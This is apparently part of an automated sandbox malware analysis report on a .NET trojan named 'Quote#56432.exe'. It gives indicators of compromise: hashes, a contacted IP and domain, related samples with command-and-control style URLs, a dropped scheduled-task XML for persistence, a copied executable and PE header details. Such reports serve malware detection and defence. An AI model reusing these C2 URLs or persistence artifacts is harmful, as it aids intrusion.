                                  http://www.fonts.comQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.jiyu-kobo.co.jp/NormQuote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.sandoll.co.krQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.urwpp.deDPleaseQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.urwpp.deQuote#56432.exe, 00000000.00000003.668210925.00000000058D0000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000003.668015602.00000000058D0000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.zhongyicts.com.cnQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.sakkal.comQuote#56432.exe, 00000000.00000003.665504791.00000000058CE000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.apache.org/licenses/LICENSE-2.0Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.comQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.fontbureau.comFQuote#56432.exe, 00000000.00000002.692495401.00000000058A0000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/-t4Quote#56432.exe, 00000000.00000003.664849579.00000000058A4000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/jp/Quote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.comaQuote#56432.exe, 00000000.00000002.692495401.00000000058A0000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.com.123Quote#56432.exe, 00000000.00000003.664495208.00000000058CF000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.carterandcone.comlQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cn/Quote#56432.exe, 00000000.00000003.663958515.00000000058CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                            high
                                            http://lovecord.datesystray.exe, 0000000F.00000002.927431554.0000000004F7F000.00000004.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.founder.com.cn/cnQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/frere-user.htmlQuote#56432.exe, 00000000.00000003.667061903.00000000058CF000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.jiyu-kobo.co.jp//zQuote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlQuote#56432.exe, 00000000.00000003.667501678.00000000058D0000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000003.667456774.00000000058D0000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.monotype.Quote#56432.exe, 00000000.00000003.672566366.00000000058D0000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/Quote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000003.664849579.00000000058A4000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/Y0-dQuote#56432.exe, 00000000.00000003.665005799.00000000058A5000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.comionoQuote#56432.exe, 00000000.00000002.692495401.00000000058A0000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/adnlQuote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers8Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.jiyu-kobo.co.jp/jQuote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.tiro.comicQuote#56432.exe, 00000000.00000003.664716460.00000000058D0000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  44.227.76.166
                                                  www.lovecord.dateUnited States
                                                  16509AMAZON-02UStrue

                                                  General Information

                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                  Analysis ID:483794
                                                  Start date:15.09.2021
                                                  Start time:13:49:17
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 11m 10s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:Quote#56432.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:21
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@11/4@2/1
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 58.8% (good quality ratio 53.1%)
                                                  • Quality average: 71.7%
                                                  • Quality standard deviation: 32%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 20.50.102.62, 20.54.110.249, 23.55.161.144, 23.55.161.137, 23.55.161.160, 23.55.161.142, 23.55.161.152, 23.55.161.155, 23.55.161.151, 23.55.161.143, 23.55.161.149, 40.112.88.60, 23.216.77.208, 23.216.77.209, 20.82.210.154
                                                  • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  13:50:18API Interceptor1x Sleep call for process: Quote#56432.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  44.227.76.166PO-80722 .xlsxGet hashmaliciousBrowse
                                                  • www.thevone.net/utrf/?bXrD=-ZxLnH5X-fMHLB&_8Q=xTZ/dx9Pfi3OU30Zu6i00tru2qtEHUHZXqGrVY3sM47aXdpgIsf41O75Pz7bolMRtoM/3A==
                                                  NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeGet hashmaliciousBrowse
                                                  • www.priorpublic.com/kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2
                                                  famz6.docGet hashmaliciousBrowse
                                                  • www.thetechguruji.com/fzsg/?n0Gh7Vm=wf/sddlrHLxWr86DXNCm9QV1puGglNyoLAn8vaYV0LCioGC0TN4y00CVwxpFrjQTiRwfdg==&DL3=SvMLQz2XqF8DGd-P
                                                  VINASHIP STAR.xlsxGet hashmaliciousBrowse
                                                  • www.vicdux.world/nthe/?U2=mv-t_rDPAPsD6l&xtxh=fxK+KfTKr6KIBuhveHuQUfG86Ez3Qoq+EupjvuH6WgTNxOFM1XFHU8sNgRKi0/CU5h4xKw==
                                                  PAYMENT ADVICE.exeGet hashmaliciousBrowse
                                                  • www.mesinionisasi.com/bp39/?6lTp=4Y691hW0OvoMbZDSxgwq+J2aC3TtKFJ+npN7jojB5ipOYThD+1a8XyK2n4/ejz5uHklM&kd3=7nx4e8sXT
                                                  ICM Stellar Presentation.xlsxGet hashmaliciousBrowse
                                                  • www.thisisatemporaryemail.com/sqwo/?yvFd9F8=gAKOWl9e4py7r9e21+qmV/gdCeDECP4mzyGv8UTw+U6fFj1uXcepbFj/x5Bbnj4wBe8X+Q==&Qp=kFNhNFH02
                                                  Payment Copy.exeGet hashmaliciousBrowse
                                                  • www.marcosms.com/stvc/?6lMx=68TspAEfKzMUR4BPxynZES70/zX9zHvygiXQYFBrW0vyxz/NqBJQuAKB66V83/W4M617&vR-=SjQHeD
                                                  Invoice BL Packing List.exeGet hashmaliciousBrowse
                                                  • www.injectionhub.com/bmg0/?YBZx=1b_TRVWpeFUP7&b0GLS69=D6f/MTSxB3eaujE6JnioweMJZfOBI5HjgQvuqdfcjvBFiHpIOxrA8TR699cvbxLWwjI1
                                                  Niagara Sc Offer.xlsxGet hashmaliciousBrowse
                                                  • www.thisisatemporaryemail.com/sqwo/?yZKX=krU4JLwh4Lst3&fDK=gAKOWl9e4py7r9e21+qmV/gdCeDECP4mzyGv8UTw+U6fFj1uXcepbFj/x5Bbnj4wBe8X+Q==
                                                  BALLANCE PAYMENT.docGet hashmaliciousBrowse
                                                  • www.vaytieudung360.com/n6ce/?JVdDiN60=NaS/yScp0tMhV2bQY4lu0z/cLtnzjeTafNc3PbEqgaRjB2tCAaVo0MIQ1Xzd3GKd5v62aA==&c8mH=8p54
                                                  LBQYQx5glN.exeGet hashmaliciousBrowse
                                                  • www.thisisatemporaryemail.com/sqwo/?4hLpbf=gAKOWl9b4uy/rtS63+qmV/gdCeDECP4mzye/gXPx606eFSZoQMPlNBb9yfNdsSs7U4Ig&g2JLWb=jR-0iz5psD
                                                  SOA.exeGet hashmaliciousBrowse
                                                  • www.promoteboost.com/bp39/?FL=aIfEOU17ssS9I9KNN0CRMP2+9kLyWdLqWCSTbg9WcvzDMJ03vmUXRFVPFPqLFna7q+Zc&3fkpkd=4hKTJV
                                                  Swift Copy.xlsxGet hashmaliciousBrowse
                                                  • www.insideajazzyminute.net/uisg/?fpzH9PF=ZuNmzYaPDLkdl2OQeY25VE/FyEJjlFonRjJafNPrT7+ByqUytzr513aHzMqla/Ed/ODEBw==&3fol=bPAh_D2h7lHH
                                                  VESSEL BOOKING DETAILS_pdf.exeGet hashmaliciousBrowse
                                                  • www.ketofoodfight.club/b6a4/?TVnLHr=ICCxxIVw57IW6kbgt+4krLOhunydb8EaldPfbo2bDwvghjkJmYLoE8h2jqshGbu7U6UC&SlTd=2d9l4Zzx
                                                  OoBepaLH3W.exeGet hashmaliciousBrowse
                                                  • www.hiddenwholesale.com/p2io/?brMXBhD=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCeYlIlfO3VWH&axl4i=0d9HO65X_T8H0F
                                                  Transfer Payment For Invoice 321-1005703.exeGet hashmaliciousBrowse
                                                  • www.vicdux.life/um8e/?n0DTzP=_R7XpHxHj&w8nHuDNH=xbMoviQlEnjsHrEbTPTiLAbjABxJdIVdbR0FO8anDWX5sWiRIQHIKvYrn6XTqKSl/tf+
                                                  Inv_7623980.exeGet hashmaliciousBrowse
                                                  • www.lagu45.com/m6b5/?hT4hjLd0=M8gjP7ya2LnHFoHlGDlt2eJ6DpCJ0XzT6n+66/k3ie3JdzdSn/c6UqnSsbXFVliIxba+&uX=8pr4D
                                                  Tlz3P6ra10.exeGet hashmaliciousBrowse
                                                  • www.hiddenwholesale.com/p2io/?B6eTzpeH=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCd0fLkz10i3WOhn+bg==&xXk8kx=Bxltd27xbtZdOP20
                                                  bbZdhGxjJW.exeGet hashmaliciousBrowse
                                                  • www.hiddenwholesale.com/p2io/?M4=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCd0mUVT260rROhn5IQ==&3ff=ArcPHv
                                                  CONTRACT 312000123 SSR ADVICE.xlsxGet hashmaliciousBrowse
                                                  • www.hiddenwholesale.com/p2io/?Z6E0vv=u0G47XCpG6&-ZYda82=es7Y2j6Y/7vfy1IfvmEK+cycNhd4T49F/AgpmDgn764GP1PGHDawcVRiB70ZTFr94UD3XQ==

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  AMAZON-02USkpbNbKpJfr.dllGet hashmaliciousBrowse
                                                  • 52.84.193.199
                                                  mfQoul1M1Q.exeGet hashmaliciousBrowse
                                                  • 52.222.161.215
                                                  k4fNN2WDpY.dllGet hashmaliciousBrowse
                                                  • 52.222.161.105
                                                  (RFQ) No.109050.xlsxGet hashmaliciousBrowse
                                                  • 75.2.89.208
                                                  Remittance_Advice_details001009142021.xlsxGet hashmaliciousBrowse
                                                  • 52.58.78.16
                                                  fCW92GQu51.exeGet hashmaliciousBrowse
                                                  • 13.238.159.178
                                                  TPJX2QwEdXs5sTV.exeGet hashmaliciousBrowse
                                                  • 54.194.41.141
                                                  tgamf4XuLa.exeGet hashmaliciousBrowse
                                                  • 99.83.154.118
                                                  SRMETALINDUSTRIES.exeGet hashmaliciousBrowse
                                                  • 44.227.65.245
                                                  PI L032452021xxls.exeGet hashmaliciousBrowse
                                                  • 99.83.154.118
                                                  Unpaid invoice.exeGet hashmaliciousBrowse
                                                  • 99.83.154.118
                                                  FaxGUO65DE.391343-Faa.htmlGet hashmaliciousBrowse
                                                  • 3.139.50.24
                                                  FaxGUO65DE.391343-Faa.htmlGet hashmaliciousBrowse
                                                  • 3.139.50.24
                                                  Elon Musk Club - 024705 .htmGet hashmaliciousBrowse
                                                  • 13.226.156.103
                                                  PGQBjDmDZ4Get hashmaliciousBrowse
                                                  • 34.249.145.219
                                                  m5DozqUO2tGet hashmaliciousBrowse
                                                  • 54.70.167.99
                                                  avxeC9WssiGet hashmaliciousBrowse
                                                  • 13.52.148.225
                                                  Wh3hrPWbBGGet hashmaliciousBrowse
                                                  • 34.249.145.219
                                                  re2.x86Get hashmaliciousBrowse
                                                  • 184.77.232.100
                                                  re2.arm7Get hashmaliciousBrowse
                                                  • 63.32.132.1

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quote#56432.exe.log
                                                  Process:C:\Users\user\Desktop\Quote#56432.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                  C:\Users\user\AppData\Local\Temp\tmp994F.tmp
                                                  Process:C:\Users\user\Desktop\Quote#56432.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1641
                                                  Entropy (8bit):5.1797729216492625
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGctn:cbhK79lNQR/rydbz9I3YODOLNdq3J
                                                  MD5:A9A91EFB313644132CAF257F5A4DF482
                                                  SHA1:09A7960E056F0B5094F35DBC9647B32F14EF9093
                                                  SHA-256:93F74A2E739775D04BFC58579C1DE9B19D8B355A592161911DAA715F78574D6E
                                                  SHA-512:76402E9405E917DC6DBD90507A0E9DFB8C4A6529C7DC311D9404C7F71E355AD57EB2DA91312342C27228B4E1C690B2E84F6F59F3C41AFA78DE00792889AFE153
                                                  Malicious:true
                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                  C:\Users\user\AppData\Roaming\ySWmXEgh.exe
                                                  Process:C:\Users\user\Desktop\Quote#56432.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):549888
                                                  Entropy (8bit):7.664798299556899
                                                  Encrypted:false
                                                  SSDEEP:12288:q6kJnWHCM2K4C5WA/w6eRH7/JE2m/u+GoqYcllpO8H:2F3C9m7RE2uuBZXL
                                                  MD5:3812EBC395330BEF949CC2C7264D1632
                                                  SHA1:4DC9FD68E73E0B14AB02670BB7C80372D0043BC4
                                                  SHA-256:97EA895E92F76192010E02F12ACA8EC4FFA1B667E84C9958332D280CED624402
                                                  SHA-512:6AB7E1DEC963D3229293E98146EA4A709D2D13413EC14BAF1711D693A6A2918D03E79DA9C6B27101682FE16ECF0021C334CB91006ECB69DDB17A306840E7510C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.@a..............0..Z...........x... ........@.. ....................................@..................................w..O.................................................................................... ............... ..H............text....X... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B.................w......H.......<[.. .......z...\...X............................................0...........(......+..~........-.......~.....(....s........s.....r...p(.......o.....r...p(........o......o......o ...t.......o!...o"...}.....d.S........o#......($........o%...}......($...r=..po&...o'...&......rO..p(.........o(.....o(....r}..p(...........*.................0............{.....+..*.0...........(......+..r...p(......~........-.......~.....(....s........s.....r...p(.......o.....r...p(........o
                                                  C:\Users\user\AppData\Roaming\ySWmXEgh.exe:Zone.Identifier
                                                  Process:C:\Users\user\Desktop\Quote#56432.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview: [ZoneTransfer]....ZoneId=0

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.664798299556899
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:Quote#56432.exe
                                                  File size:549888
                                                  MD5:3812ebc395330bef949cc2c7264d1632
                                                  SHA1:4dc9fd68e73e0b14ab02670bb7c80372d0043bc4
                                                  SHA256:97ea895e92f76192010e02f12aca8ec4ffa1b667e84c9958332d280ced624402
                                                  SHA512:6ab7e1dec963d3229293e98146ea4a709d2d13413ec14baf1711d693a6a2918d03e79da9c6b27101682fe16ecf0021c334cb91006ecb69ddb17a306840e7510c
                                                  SSDEEP:12288:q6kJnWHCM2K4C5WA/w6eRH7/JE2m/u+GoqYcllpO8H:2F3C9m7RE2uuBZXL
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.@a..............0..Z...........x... ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:00828e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x487806
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x6140D14A [Tue Sep 14 16:43:54 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x877b40x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x880000x5e4.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
